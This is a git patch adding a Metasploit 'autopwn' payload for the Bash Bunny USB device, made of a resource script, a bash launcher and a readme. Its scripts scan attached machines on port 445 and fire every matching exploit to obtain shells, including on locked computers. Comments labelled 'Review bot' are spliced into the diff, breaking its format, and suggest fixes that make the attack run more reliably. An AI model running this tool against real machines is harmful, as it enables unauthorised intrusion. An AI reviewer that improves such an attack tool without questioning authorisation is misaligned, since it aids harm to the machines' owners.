From ddcd785deb69d70c3c42a0b9566d0d3f7b7dd8c4 Mon Sep 17 00:00:00 2001
From: "Mohamed A. Baset"
Date: Thu, 7 Sep 2017 18:18:44 -0500
Subject: [PATCH] Metasploit Autopwn Bash Bunny Payload (#242)
---
.../Metasploit-Autopwn/auto_pwn.rc | 29 +++++++++++++++++
.../Metasploit-Autopwn/payload.txt | 32 +++++++++++++++++++
.../exploitation/Metasploit-Autopwn/readme.md | 29 +++++++++++++++++
3 files changed, 90 insertions(+)
create mode 100644 payloads/library/exploitation/Metasploit-Autopwn/auto_pwn.rc
create mode 100644 payloads/library/exploitation/Metasploit-Autopwn/payload.txt
create mode 100644 payloads/library/exploitation/Metasploit-Autopwn/readme.md
diff --git a/payloads/library/exploitation/Metasploit-Autopwn/auto_pwn.rc b/payloads/library/exploitation/Metasploit-Autopwn/auto_pwn.rc
new file mode 100644
index 00000000..a5cb4906
--- /dev/null
+++ b/payloads/library/exploitation/Metasploit-Autopwn/auto_pwn.rc
@@ -0,0 +1,29 @@
+# Connect to pre-created metasploit database called "postgres"
+db_connect postgres
+load db_autopwn
+
+# This sleep because everytime we load db_autopwn module, metasploit is rebuilding the database cache (need more digging into this to cancel this stage)
+sleep 60
+
+# Purge old data to not to be included in the attack
+hosts -d
+services -d
+
+# Start db_nmap metasploit scanning module (scan all the dhcp clients except the Bunny itself, feel free also to include any services port you want to exploit)
+db_nmap 172.16.64.2-254 -p 445 -v 1 -O --reason
+sleep 5
+
+# Show hosts after db_nmap scan
+hosts
+
+# Show services after db_nmap scan
+services
+
+# Initiate db_autopwn metasploit module
+db_autopwn -t -p -r -e -T 20
+
+# Show created metasploit sessions
+sleep 5
+sessions
+# Finish
+sleep 10
diff --git a/payloads/library/exploitation/Metasploit-Autopwn/payload.txt b/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
new file mode 100644
index 00000000..a5d11867
--- /dev/null
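Review bot: The scan line `db_nmap 172.16.64.2-254 -p 445 -v 1 -O --reason` hands `1` to nmap as a separate argument, and since nmap's `-v` takes no value, `1` will be parsed as an additional target spec rather than a verbosity level; the intended form is `db_nmap 172.16.64.2-254 -p 445 -v -O --reason`. On scope, `hosts -d` and `services -d` with no filter wipe every host and service in the current workspace, so a dedicated `workspace -a bunny` before the purge would keep other engagement data on the same database intact, and because `db_autopwn -e` then fires every port-matched exploit at every host left in the workspace, the nmap range is the only thing limiting what gets attacked. The file also ends on `sleep 10` with no `exit`; unless msfconsole's stdin is closed on the device it will drop to its interactive prompt after the resource script, and the calling payload may never get past it — appending `exit -y` would make the run terminate deterministically.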
+++ b/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
@@ -0,0 +1,32 @@
+#!/bin/bash
+#
+# Title: Metasploit-Autopwn
+# Author: Mohamed A. Baset - @SymbianSyMoh - Seekurity.com
+# Version: 0.1
+#
+#
+# Runs Metasploit db_autopwn module against the whole dhcp clients conencted
+# to the Bash Bunny device exploiting locked and unlocked machines that running
+# vulnerable OSes or services.
+# Prequisities:
+# 1. Ruby 2.4.1 installed via rbenv (the best to have ruby installed without any problems)
+# 2. You must have metasploit installation up and running in path /toos/metasploit-framework/
+# 3. Copy auto_pwn.rc metasploit resources file from the payload folder to /tools/ by SSHing into your bunny
+# 4. One-time fix for adding user "postgres" to the network user groups (should be done by HAK5 folks in the first place)
+
+# Script
+# LED SETUP................Setting up stuff
+# LED ATTACK...............Running Metasploit Autopwn Module
+# LED FINISH...............Attack Finished
+
+LED SETUP
+# One-time fix for adding user "postgres" to the network user groups
+usermod -a -G netdev,systemd-network,net_raw postgres
+CUCUMBER PLAID
+ATTACKMODE RNDIS_ETHERNET
+# Please adjust a nearest date/time
+# date -s "20170830 01:23"
+LED ATTACK
+# For debugging we are writing the whole output into a file in /tools
+/root/.rbenv/shims/ruby /tools/metasploit-framework/msfconsole -r /tools/auto_pwn.rc >> /tools/msfAutopwnOUTPUT.txt
+LED FINISH
diff --git a/payloads/library/exploitation/Metasploit-Autopwn/readme.md b/payloads/library/exploitation/Metasploit-Autopwn/readme.md
new file mode 100644
index 00000000..6d970cf3
--- /dev/null
+++ b/payloads/library/exploitation/Metasploit-Autopwn/readme.md
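Review bot: The msfconsole line redirects only stdout into `/tools/msfAutopwnOUTPUT.txt` and nothing checks that `/root/.rbenv/shims/ruby`, `/tools/metasploit-framework/msfconsole` or `/tools/auto_pwn.rc` exist, so when a prerequisite is missing the error is lost and `LED FINISH` still lights as if the attack ran. I would guard the run and capture stderr as below, using `LED FAIL` from the same shortcut family as the SETUP/ATTACK/FINISH states already in use (confirm it is available on the target firmware). The header comment also says the framework lives in `/toos/metasploit-framework/` while the command uses `/tools/metasploit-framework/`; the comment should read `/tools/`. Finally, the `usermod` step runs on every insertion rather than once as its comment says; `-a` makes it idempotent so it is harmless, but the comment should say so.
```shell
LED ATTACK
RUBY=/root/.rbenv/shims/ruby
MSF=/tools/metasploit-framework/msfconsole
RC=/tools/auto_pwn.rc
LOG=/tools/msfAutopwnOUTPUT.txt
# Refuse to run when a prerequisite is missing so FINISH never lights on a no-op
if [ ! -x "$RUBY" ] || [ ! -f "$MSF" ] || [ ! -f "$RC" ]; then
  echo "missing ruby, msfconsole or auto_pwn.rc" >> "$LOG"
  LED FAIL
  exit 1
fi
# For debugging: stdout AND stderr go into the log file
"$RUBY" "$MSF" -r "$RC" >> "$LOG" 2>&1
LED FINISH
```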
@@ -0,0 +1,29 @@
+# Metasploit-Autopwn
+
+* Author: Mohamed A. Baset - @SymbianSyMoh - Seekurity.com
+* Version: Version 0.1
+* Target: All OS / services
+
+## Description:
+
+Runs Metasploit db_autopwn module against the dhcp connected client to the Bash Bunny device exploiting locked and unlocked machines that running vulnerable OSes or services.
+
+## Configuration/Prequisities:
+
+1. Ruby 2.4.1 installed via 'rbenv' (the best to have ruby installed without any problems)
+2. You must have metasploit installation up and running in path /toos/metasploit-framework/
+3. Copy auto_pwn.rc metasploit resources file from the payload folder to /tools/ by SSHing into your bunny
+4. One-time fix for adding user "postgres" to the network user groups (should be done by HAK5 folks in the first place)
+
+
+
+## STATUS
+
+| LED | Status |
+| ------------------ | -----------------------------------------------|
+| Setup | Setting up stuff |
+| ATTACK | Running Metasploit Autopwn Module |
+| FINISH | Attack Finished (hopefully we got some shells) |
+
+## Discussion
+https://forums.hak5.org/topic/41737-metasploit-framework-with-db_autopwn-module-on-bashbunny/